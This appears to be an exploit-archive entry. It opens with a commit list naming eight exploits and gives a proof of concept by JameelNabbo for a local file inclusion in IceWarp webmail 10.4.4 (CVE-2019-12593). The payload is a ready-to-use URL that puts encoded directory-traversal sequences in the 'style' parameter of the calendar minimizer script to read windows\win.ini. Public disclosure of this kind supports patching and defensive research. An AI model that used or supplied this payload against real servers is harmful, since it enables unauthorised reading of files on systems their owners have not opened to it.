
8 changes to exploits/shellcodes DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow Cisco RV130W 1.0.3.44 - Remote Stack Overflow IceWarp 10.4.4 - Local File Inclusion Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting
15 lines
No EOL
505 B
Text
15 lines
No EOL
505 B
Text
# Exploit Title: IceWarp <=10.4.4 local file include
|
|
# Date: 02/06/2019
|
|
# Exploit Author: JameelNabbo
|
|
# Website: uitsec.com
|
|
# Vendor Homepage: http://www.icewarp.com
|
|
# Software Link: https://www.icewarp.com/downloads/trial/
|
|
# Version: 10.4.4
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2019-12593
|
|
POC:
|
|
|
|
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
|
|
|
|
Example:
|
|
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini |